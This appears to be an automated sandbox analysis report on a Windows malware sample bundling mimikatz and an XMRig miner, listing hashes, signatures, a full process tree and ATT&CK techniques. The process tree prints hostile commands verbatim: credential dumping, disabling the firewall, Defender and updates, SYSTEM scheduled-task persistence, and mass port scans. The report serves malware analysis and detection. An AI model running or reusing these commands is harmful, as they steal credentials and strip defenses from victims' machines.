Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    27-04-2024 17:38

General

  • Target

    2024-04-27_1dac3986468ad393027098673c173bf8_hacktools_icedid_mimikatz.exe

  • Size

    8.6MB

  • MD5

    1dac3986468ad393027098673c173bf8

  • SHA1

    e12607102651318e4c151d0e3103e2125feb3a84

  • SHA256

    5f1e12f61064170ef68b423219672a0d39779d677578bdb377b536447a77ae7b

  • SHA512

    fd6796e97e497fa23211172f243d5b25f9c663d9211543d65cd93bb4e8c635e79e212edc36b424df2f444924948e01f783803bb53f752ec985c000dbf02ed811

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (28226) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
  • UPX dump on OEP (original entry point) 33 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 7 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 22 IoCs
  • UPX packed file 30 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 12 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 31 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:1080
      • C:\Windows\TEMP\rpbbiqrft\iblrke.exe
        "C:\Windows\TEMP\rpbbiqrft\iblrke.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1936
    • C:\Users\Admin\AppData\Local\Temp\2024-04-27_1dac3986468ad393027098673c173bf8_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-04-27_1dac3986468ad393027098673c173bf8_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2220
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\vlucllpw\bbibgge.exe
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3056
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:2488
        • C:\Windows\vlucllpw\bbibgge.exe
          C:\Windows\vlucllpw\bbibgge.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2600
    • C:\Windows\vlucllpw\bbibgge.exe
      C:\Windows\vlucllpw\bbibgge.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:2400
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:2516
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:2548
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:2420
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:2652
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:2380
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:2500
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add policy name=Bastards description=FuckingBastards
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:1660
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static add filteraction name=BastardsList action=block
                    2⤵
                    • Modifies data under HKEY_USERS
                    PID:860
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c C:\Windows\gtbtbtiti\ferwkwttm\wpcap.exe /S
                    2⤵
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1976
                    • C:\Windows\gtbtbtiti\ferwkwttm\wpcap.exe
                      C:\Windows\gtbtbtiti\ferwkwttm\wpcap.exe /S
                      3⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Drops file in System32 directory
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:544
                      • C:\Windows\SysWOW64\net.exe
                        net stop "Boundary Meter"
                        4⤵
                          PID:2288
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop "Boundary Meter"
                            5⤵
                              PID:2136
                          • C:\Windows\SysWOW64\net.exe
                            net stop "TrueSight Meter"
                            4⤵
                              PID:2716
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "TrueSight Meter"
                                5⤵
                                  PID:624
                              • C:\Windows\SysWOW64\net.exe
                                net stop npf
                                4⤵
                                  PID:2468
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:1124
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:2836
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:2696
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:2708
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:2184
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:1972
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:2356
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:324
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:480
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\gtbtbtiti\ferwkwttm\ubltspefw.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtbtbtiti\ferwkwttm\Scant.txt
                                                2⤵
                                                • Loads dropped DLL
                                                PID:356
                                                • C:\Windows\gtbtbtiti\ferwkwttm\ubltspefw.exe
                                                  C:\Windows\gtbtbtiti\ferwkwttm\ubltspefw.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtbtbtiti\ferwkwttm\Scant.txt
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  PID:696
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\gtbtbtiti\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gtbtbtiti\Corporate\log.txt
                                                2⤵
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                PID:1304
                                                • C:\Windows\gtbtbtiti\Corporate\vfshost.exe
                                                  C:\Windows\gtbtbtiti\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:856
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "elucnzufu" /ru system /tr "cmd /c C:\Windows\ime\bbibgge.exe"
                                                2⤵
                                                  PID:896
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                    3⤵
                                                      PID:608
                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                      schtasks /create /sc minute /mo 1 /tn "elucnzufu" /ru system /tr "cmd /c C:\Windows\ime\bbibgge.exe"
                                                      3⤵
                                                      • Creates scheduled task(s)
                                                      PID:3028
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "llmbfteeq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F"
                                                    2⤵
                                                      PID:3012
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                        3⤵
                                                          PID:1012
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          schtasks /create /sc minute /mo 1 /tn "llmbfteeq" /ru system /tr "cmd /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F"
                                                          3⤵
                                                          • Creates scheduled task(s)
                                                          PID:2980
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qieiimgin" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F"
                                                        2⤵
                                                          PID:1652
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                            3⤵
                                                              PID:1932
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /create /sc minute /mo 1 /tn "qieiimgin" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F"
                                                              3⤵
                                                              • Creates scheduled task(s)
                                                              PID:1440
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                            2⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:2744
                                                          • C:\Windows\SysWOW64\netsh.exe
                                                            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                            2⤵
                                                              PID:1876
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2900
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static set policy name=Bastards assign=y
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2216
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2432
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2684
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                              2⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:2528
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static set policy name=Bastards assign=y
                                                              2⤵
                                                                PID:2824
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                2⤵
                                                                  PID:1372
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                  2⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:2448
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:2236
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:1244
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c net stop SharedAccess
                                                                      2⤵
                                                                        PID:1560
                                                                        • C:\Windows\SysWOW64\net.exe
                                                                          net stop SharedAccess
                                                                          3⤵
                                                                            PID:2136
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                              4⤵
                                                                                PID:1492
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                            2⤵
                                                                              PID:2116
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh firewall set opmode mode=disable
                                                                                3⤵
                                                                                • Modifies Windows Firewall
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:1280
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                              2⤵
                                                                                PID:624
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh Advfirewall set allprofiles state off
                                                                                  3⤵
                                                                                  • Modifies Windows Firewall
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:1516
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                cmd /c net stop MpsSvc
                                                                                2⤵
                                                                                  PID:2032
                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                    net stop MpsSvc
                                                                                    3⤵
                                                                                      PID:3052
                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                        4⤵
                                                                                          PID:480
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop WinDefend
                                                                                      2⤵
                                                                                        PID:2020
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop WinDefend
                                                                                          3⤵
                                                                                            PID:1604
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                              4⤵
                                                                                                PID:2708
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c net stop wuauserv
                                                                                            2⤵
                                                                                              PID:3060
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net stop wuauserv
                                                                                                3⤵
                                                                                                  PID:1972
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                    4⤵
                                                                                                      PID:1540
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                  2⤵
                                                                                                    PID:1204
                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                      sc config MpsSvc start= disabled
                                                                                                      3⤵
                                                                                                      • Launches sc.exe
                                                                                                      PID:2192
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                    2⤵
                                                                                                      PID:2836
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc config SharedAccess start= disabled
                                                                                                        3⤵
                                                                                                        • Launches sc.exe
                                                                                                        PID:2764
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                      2⤵
                                                                                                        PID:2060
                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                          sc config WinDefend start= disabled
                                                                                                          3⤵
                                                                                                          • Launches sc.exe
                                                                                                          PID:324
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                        2⤵
                                                                                                          PID:544
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc config wuauserv start= disabled
                                                                                                            3⤵
                                                                                                            • Launches sc.exe
                                                                                                            PID:764
                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:1416
                                                                                                        • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                          C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1044 C:\Windows\TEMP\gtbtbtiti\1044.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2888
                                                                                                        • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                          C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1072 C:\Windows\TEMP\gtbtbtiti\1072.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:928
                                                                                                        • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                          C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1080 C:\Windows\TEMP\gtbtbtiti\1080.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2072
                                                                                                        • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                          C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 2880 C:\Windows\TEMP\gtbtbtiti\2880.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2664
                                                                                                        • C:\Windows\TEMP\gtbtbtiti\fableieee.exe
                                                                                                          C:\Windows\TEMP\gtbtbtiti\fableieee.exe -accepteula -mp 1216 C:\Windows\TEMP\gtbtbtiti\1216.dmp
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:2892
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c C:\Windows\gtbtbtiti\ferwkwttm\scan.bat
                                                                                                          2⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:1404
                                                                                                          • C:\Windows\gtbtbtiti\ferwkwttm\zrrfwbgsc.exe
                                                                                                            zrrfwbgsc.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:2320
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                          2⤵
                                                                                                            PID:3036
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                              3⤵
                                                                                                                PID:1856
                                                                                                              • C:\Windows\SysWOW64\cacls.exe
                                                                                                                cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                3⤵
                                                                                                                  PID:2276
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                  3⤵
                                                                                                                    PID:3160
                                                                                                                  • C:\Windows\SysWOW64\cacls.exe
                                                                                                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                    3⤵
                                                                                                                      PID:3732
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                      3⤵
                                                                                                                        PID:3144
                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                        3⤵
                                                                                                                          PID:2284
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
                                                                                                                      1⤵
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:2600
                                                                                                                    • C:\Windows\SysWOW64\rifzsk.exe
                                                                                                                      C:\Windows\SysWOW64\rifzsk.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:1056
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:2544
                                                                                                                      • C:\Windows\system32\taskeng.exe
                                                                                                                        taskeng.exe {BD03661D-0364-40FE-BE13-401928FB83BE} S-1-5-18:NT AUTHORITY\System:Service:
                                                                                                                        1⤵
                                                                                                                          PID:2504
                                                                                                                          • C:\Windows\system32\cmd.EXE
                                                                                                                            C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                            2⤵
                                                                                                                              PID:980
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:2820
                                                                                                                                • C:\Windows\system32\cacls.exe
                                                                                                                                  cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                  3⤵
                                                                                                                                    PID:1264
                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                  C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbibgge.exe
                                                                                                                                  2⤵
                                                                                                                                    PID:2532
                                                                                                                                    • C:\Windows\ime\bbibgge.exe
                                                                                                                                      C:\Windows\ime\bbibgge.exe
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:2428
                                                                                                                                  • C:\Windows\system32\cmd.EXE
                                                                                                                                    C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                    2⤵
                                                                                                                                      PID:1740
                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:2988
                                                                                                                                        • C:\Windows\system32\cacls.exe
                                                                                                                                          cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                          3⤵
                                                                                                                                            PID:1660
                                                                                                                                        • C:\Windows\system32\cmd.EXE
                                                                                                                                          C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                          2⤵
                                                                                                                                            PID:1860
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                              3⤵
                                                                                                                                                PID:3352
                                                                                                                                              • C:\Windows\system32\cacls.exe
                                                                                                                                                cacls C:\Windows\TEMP\rpbbiqrft\iblrke.exe /p everyone:F
                                                                                                                                                3⤵
                                                                                                                                                  PID:904
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c C:\Windows\ime\bbibgge.exe
                                                                                                                                                2⤵
                                                                                                                                                  PID:3100
                                                                                                                                                  • C:\Windows\ime\bbibgge.exe
                                                                                                                                                    C:\Windows\ime\bbibgge.exe
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:3264
                                                                                                                                                • C:\Windows\system32\cmd.EXE
                                                                                                                                                  C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3152
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3300
                                                                                                                                                      • C:\Windows\system32\cacls.exe
                                                                                                                                                        cacls C:\Windows\vlucllpw\bbibgge.exe /p everyone:F
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3208
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:2672
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                          PID:3940

                                                                                                                                                        Network

                                                                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                        Execution

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Persistence

                                                                                                                                                        Create or Modify System Process

                                                                                                                                                        1
                                                                                                                                                        T1543

                                                                                                                                                        Windows Service

                                                                                                                                                        1
                                                                                                                                                        T1543.003

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        1
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1547.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Privilege Escalation

                                                                                                                                                        Create or Modify System Process

                                                                                                                                                        1
                                                                                                                                                        T1543

                                                                                                                                                        Windows Service

                                                                                                                                                        1
                                                                                                                                                        T1543.003

                                                                                                                                                        Boot or Logon Autostart Execution

                                                                                                                                                        1
                                                                                                                                                        T1547

                                                                                                                                                        Registry Run Keys / Startup Folder

                                                                                                                                                        1
                                                                                                                                                        T1547.001

                                                                                                                                                        Scheduled Task/Job

                                                                                                                                                        1
                                                                                                                                                        T1053

                                                                                                                                                        Defense Evasion

                                                                                                                                                        Impair Defenses

                                                                                                                                                        1
                                                                                                                                                        T1562

                                                                                                                                                        Disable or Modify System Firewall

                                                                                                                                                        1
                                                                                                                                                        T1562.004

                                                                                                                                                        Modify Registry

                                                                                                                                                        2
                                                                                                                                                        T1112

                                                                                                                                                        Subvert Trust Controls

                                                                                                                                                        1
                                                                                                                                                        T1553

                                                                                                                                                        Install Root Certificate

                                                                                                                                                        1
                                                                                                                                                        T1553.004

                                                                                                                                                        Discovery

                                                                                                                                                        Network Service Discovery

                                                                                                                                                        2
                                                                                                                                                        T1046

                                                                                                                                                        Query Registry

                                                                                                                                                        1
                                                                                                                                                        T1012

                                                                                                                                                        System Information Discovery

                                                                                                                                                        1
                                                                                                                                                        T1082

